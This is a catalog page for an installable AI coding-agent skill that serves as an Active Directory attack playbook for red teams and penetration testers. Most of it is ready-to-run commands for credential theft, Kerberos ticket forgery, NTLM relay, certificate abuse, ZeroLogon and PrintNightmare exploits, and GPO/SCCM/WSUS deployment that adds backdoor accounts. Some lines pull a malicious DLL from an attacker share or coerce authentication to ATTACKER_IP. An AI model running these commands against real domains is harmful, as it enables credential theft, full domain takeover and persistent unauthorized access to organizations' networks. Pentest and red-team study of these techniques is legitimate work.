Active Directory Attacks
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Packaged view
This page reorganizes the original catalog entry around fit, installability, and workflow context first. The original raw source lives below.
Install command
npx @skill-hub/cli install zebbern-claude-code-guide-active-directory-attacks
Repository
Skill path: skills/active-directory-attacks
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Open repositoryBest for
Primary workflow: Ship Full Stack.
Technical facets: Full Stack, Testing.
Target audience: everyone.
License: Unknown.
Original source
Catalog source: SkillHub Club.
Repository owner: zebbern.
This is still a mirrored public skill entry. Review the repository before installing into production workflows.
What it helps with
- Install Active Directory Attacks into Claude Code, Codex CLI, Gemini CLI, or OpenCode workflows
- Review https://github.com/zebbern/claude-code-guide before adding Active Directory Attacks to shared team environments
- Use Active Directory Attacks for development workflows
Works across
Favorites: 0.
Sub-skills: 0.
Aggregator: No.
Original source / Raw SKILL.md
--- name: Active Directory Attacks description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. metadata: author: zebbern version: "1.1" --- # Active Directory Attacks ## Purpose Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing. ## Inputs/Prerequisites - Kali Linux or Windows attack platform - Domain user credentials (for most attacks) - Network access to Domain Controller - Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec ## Outputs/Deliverables - Domain enumeration data - Extracted credentials and hashes - Kerberos tickets for impersonation - Domain Administrator access - Persistent access mechanisms --- ## Essential Tools | Tool | Purpose | |------|---------| | BloodHound | AD attack path visualization | | Impacket | Python AD attack tools | | Mimikatz | Credential extraction | | Rubeus | Kerberos attacks | | CrackMapExec | Network exploitation | | PowerView | AD enumeration | | Responder | LLMNR/NBT-NS poisoning | --- ## Core Workflow ### Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes): ```bash # Detect clock skew nmap -sT 10.10.10.10 -p445 --script smb2-time # Fix clock on Linux sudo date -s "14 APR 2024 18:25:16" # Fix clock on Windows net time /domain /set # Fake clock without changing system time faketime -f '+8h' <command> ``` ### Step 2: AD Reconnaissance with BloodHound ```bash # Start BloodHound neo4j console bloodhound --no-sandbox # Collect data with SharpHound .\SharpHound.exe -c All .\SharpHound.exe -c All --ldapusername user --ldappassword pass # Python collector (from Linux) bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all ``` ### Step 3: PowerView Enumeration ```powershell # Get domain info Get-NetDomain Get-DomainSID Get-NetDomainController # Enumerate users Get-NetUser Get-NetUser -SamAccountName targetuser Get-UserProperty -Properties pwdlastset # Enumerate groups Get-NetGroupMember -GroupName "Domain Admins" Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member # Find local admin access Find-LocalAdminAccess -Verbose # User hunting Invoke-UserHunter Invoke-UserHunter -Stealth ``` --- ## Credential Attacks ### Password Spraying ```bash # Using kerbrute ./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123 # Using CrackMapExec crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success ``` ### Kerberoasting Extract service account TGS tickets and crack offline: ```bash # Impacket GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt # Rubeus .\Rubeus.exe kerberoast /outfile:hashes.txt # CrackMapExec crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt # Crack with hashcat hashcat -m 13100 hashes.txt rockyou.txt ``` ### AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication": ```bash # Impacket GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat # Rubeus .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt # Crack with hashcat hashcat -m 18200 hashes.txt rockyou.txt ``` ### DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights): ```bash # Impacket secretsdump.py domain.local/admin:[email protected] -just-dc-user krbtgt # Mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /domain:domain.local /user:Administrator ``` --- ## Kerberos Ticket Attacks ### Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user: ```powershell # Get krbtgt hash via DCSync first # Mimikatz - Create Golden Ticket kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt # Impacket ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass domain.local/[email protected] ``` ### Silver Ticket Forge TGS for specific service: ```powershell # Mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt ``` ### Pass-the-Hash ```bash # Impacket psexec.py domain.local/[email protected] -hashes :NTHASH wmiexec.py domain.local/[email protected] -hashes :NTHASH smbexec.py domain.local/[email protected] -hashes :NTHASH # CrackMapExec crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth ``` ### OverPass-the-Hash Convert NTLM hash to Kerberos ticket: ```bash # Impacket getTGT.py domain.local/user -hashes :NTHASH export KRB5CCNAME=user.ccache # Rubeus .\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt ``` --- ## NTLM Relay Attacks ### Responder + ntlmrelayx ```bash # Start Responder (disable SMB/HTTP for relay) responder -I eth0 -wrf # Start relay ntlmrelayx.py -tf targets.txt -smb2support # LDAP relay for delegation attack ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access ``` ### SMB Signing Check ```bash crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt ``` --- ## Certificate Services Attacks (AD CS) ### ESC1 - Misconfigured Templates ```bash # Find vulnerable templates certipy find -u [email protected] -p password -dc-ip 10.10.10.10 # Exploit ESC1 certipy req -u [email protected] -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn [email protected] # Authenticate with certificate certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 ``` ### ESC8 - Web Enrollment Relay ```bash ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController ``` --- ## Critical CVEs ### ZeroLogon (CVE-2020-1472) ```bash # Check vulnerability crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon # Exploit python3 cve-2020-1472-exploit.py DC01 10.10.10.10 # Extract hashes secretsdump.py -just-dc domain.local/DC01\[email protected] -no-pass # Restore password (important!) python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD ``` ### PrintNightmare (CVE-2021-1675) ```bash # Check for vulnerability rpcdump.py @10.10.10.10 | grep 'MS-RPRN' # Exploit (requires hosting malicious DLL) python3 CVE-2021-1675.py domain.local/user:[email protected] '\\attacker\share\evil.dll' ``` ### samAccountName Spoofing (CVE-2021-42278/42287) ```bash # Automated exploitation python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell ``` --- ## Quick Reference | Attack | Tool | Command | |--------|------|---------| | Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` | | AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` | | DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` | | Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` | | Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` | | Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` | --- ## Constraints **Must:** - Synchronize time with DC before Kerberos attacks - Have valid domain credentials for most attacks - Document all compromised accounts **Must Not:** - Lock out accounts with excessive password spraying - Modify production AD objects without approval - Leave Golden Tickets without documentation **Should:** - Run BloodHound for attack path discovery - Check for SMB signing before relay attacks - Verify patch levels for CVE exploitation --- ## Examples ### Example 1: Domain Compromise via Kerberoasting ```bash # 1. Find service accounts with SPNs GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 # 2. Request TGS tickets GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt # 3. Crack tickets hashcat -m 13100 tgs.txt rockyou.txt # 4. Use cracked service account psexec.py domain.local/svc_admin:[email protected] ``` ### Example 2: NTLM Relay to LDAP ```bash # 1. Start relay targeting LDAP ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access # 2. Trigger authentication (e.g., via PrinterBug) python3 printerbug.py domain.local/user:pass@target 10.10.10.12 # 3. Use created machine account for RBCD attack ``` --- ## Troubleshooting | Issue | Solution | |-------|----------| | Clock skew too great | Sync time with DC or use faketime | | Kerberoasting returns empty | No service accounts with SPNs | | DCSync access denied | Need Replicating Directory Changes rights | | NTLM relay fails | Check SMB signing, try LDAP target | | BloodHound empty | Verify collector ran with correct creds | --- ## Additional Resources For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md). --- ## Referenced Files > The following files are referenced in this skill and included for context. ### references/advanced-attacks.md ```markdown # Advanced Active Directory Attacks Reference ## Table of Contents 1. [Delegation Attacks](#delegation-attacks) 2. [Group Policy Object Abuse](#group-policy-object-abuse) 3. [RODC Attacks](#rodc-attacks) 4. [SCCM/WSUS Deployment](#sccmwsus-deployment) 5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs) 6. [Trust Relationship Attacks](#trust-relationship-attacks) 7. [ADFS Golden SAML](#adfs-golden-saml) 8. [Credential Sources](#credential-sources) 9. [Linux AD Integration](#linux-ad-integration) --- ## Delegation Attacks ### Unconstrained Delegation When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory. **Find Delegation:** ```powershell # PowerShell Get-ADComputer -Filter {TrustedForDelegation -eq $True} # BloodHound MATCH (c:Computer {unconstraineddelegation:true}) RETURN c ``` **SpoolService Abuse:** ```bash # Check spooler service ls \\dc01\pipe\spoolss # Trigger with SpoolSample .\SpoolSample.exe DC01.domain.local HELPDESK.domain.local # Or with printerbug.py python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP ``` **Monitor with Rubeus:** ```powershell Rubeus.exe monitor /interval:1 ``` ### Constrained Delegation **Identify:** ```powershell Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo ``` **Exploit with Rubeus:** ```powershell # S4U2 attack Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt ``` **Exploit with Impacket:** ```bash getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP ``` ### Resource-Based Constrained Delegation (RBCD) ```powershell # Create machine account New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force) # Set delegation Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$ # Get ticket .\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt ``` --- ## Group Policy Object Abuse ### Find Vulnerable GPOs ```powershell Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")} ``` ### Abuse with SharpGPOAbuse ```powershell # Add local admin .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO" # Add user rights .\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO" # Add immediate task .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO" ``` ### Abuse with pyGPOAbuse (Linux) ```bash ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" ``` --- ## RODC Attacks ### RODC Golden Ticket RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup. ### RODC Key List Attack **Requirements:** - krbtgt credentials of the RODC (-rodcKey) - ID of the krbtgt account of the RODC (-rodcNo) ```bash # Impacket keylistattack keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full # Using secretsdump with keylist secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist ``` **Using Rubeus:** ```powershell Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx ``` --- ## SCCM/WSUS Deployment ### SCCM Attack with MalSCCM ```bash # Locate SCCM server MalSCCM.exe locate # Enumerate targets MalSCCM.exe inspect /all MalSCCM.exe inspect /computers # Create target group MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC # Create malicious app MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe" # Deploy MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update # Force checkin MalSCCM.exe checkin /groupname:TargetGroup # Cleanup MalSCCM.exe app /cleanup /name:backdoor MalSCCM.exe group /delete /groupname:TargetGroup ``` ### SCCM Network Access Accounts ```powershell # Find SCCM blob Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" # Decrypt with SharpSCCM .\SharpSCCM.exe get naa -u USERNAME -p PASSWORD ``` ### WSUS Deployment Attack ```bash # Using SharpWSUS SharpWSUS.exe locate SharpWSUS.exe inspect # Create malicious update SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update" # Deploy to target SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group" # Check status SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local # Cleanup SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group" ``` --- ## AD Certificate Services (ADCS) ### ESC1 - Misconfigured Templates Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU. ```bash # Find vulnerable templates certipy find -u [email protected] -p password -dc-ip DC_IP -vulnerable # Request certificate as admin certipy req -u [email protected] -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn [email protected] # Authenticate certipy auth -pfx administrator.pfx -dc-ip DC_IP ``` ### ESC4 - ACL Vulnerabilities ```python # Check for WriteProperty python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl # Add ENROLLEE_SUPPLIES_SUBJECT flag python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT # Perform ESC1, then restore python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag ``` ### ESC8 - NTLM Relay to Web Enrollment ```bash # Start relay ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController # Coerce authentication python3 petitpotam.py ATTACKER_IP DC_IP # Use certificate Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt ``` ### Shadow Credentials ```bash # Add Key Credential (pyWhisker) python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add # Get TGT with PKINIT python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache # Get NT hash export KRB5CCNAME=target.ccache python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET ``` --- ## Trust Relationship Attacks ### Child to Parent Domain (SID History) ```powershell # Get Enterprise Admins SID from parent $ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519" # Create Golden Ticket with SID History kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt ``` ### Forest to Forest (Trust Ticket) ```bash # Dump trust key lsadump::trust /patch # Forge inter-realm TGT kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi # Use trust ticket .\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt ``` --- ## ADFS Golden SAML **Requirements:** - ADFS service account access - Token signing certificate (PFX + decryption password) ```bash # Dump with ADFSDump .\ADFSDump.exe # Forge SAML token python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid [email protected] ``` --- ## Credential Sources ### LAPS Password ```powershell # PowerShell Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' # CrackMapExec crackmapexec ldap DC_IP -u user -p password -M laps ``` ### GMSA Password ```powershell # PowerShell + DSInternals $gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword' $mp = $gmsa.'msDS-ManagedPassword' ConvertFrom-ADManagedPasswordBlob $mp ``` ```bash # Linux with bloodyAD python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword ``` ### Group Policy Preferences (GPP) ```bash # Find in SYSVOL findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml # Decrypt python3 Get-GPPPassword.py -no-pass 'DC_IP' ``` ### DSRM Credentials ```powershell # Dump DSRM hash Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' # Enable DSRM admin logon Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 ``` --- ## Linux AD Integration ### CCACHE Ticket Reuse ```bash # Find tickets ls /tmp/ | grep krb5cc # Use ticket export KRB5CCNAME=/tmp/krb5cc_1000 ``` ### Extract from Keytab ```bash # List keys klist -k /etc/krb5.keytab # Extract with KeyTabExtract python3 keytabextract.py /etc/krb5.keytab ``` ### Extract from SSSD ```bash # Database location /var/lib/sss/secrets/secrets.ldb # Key location /var/lib/sss/secrets/.secrets.mkey # Extract python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey ``` ```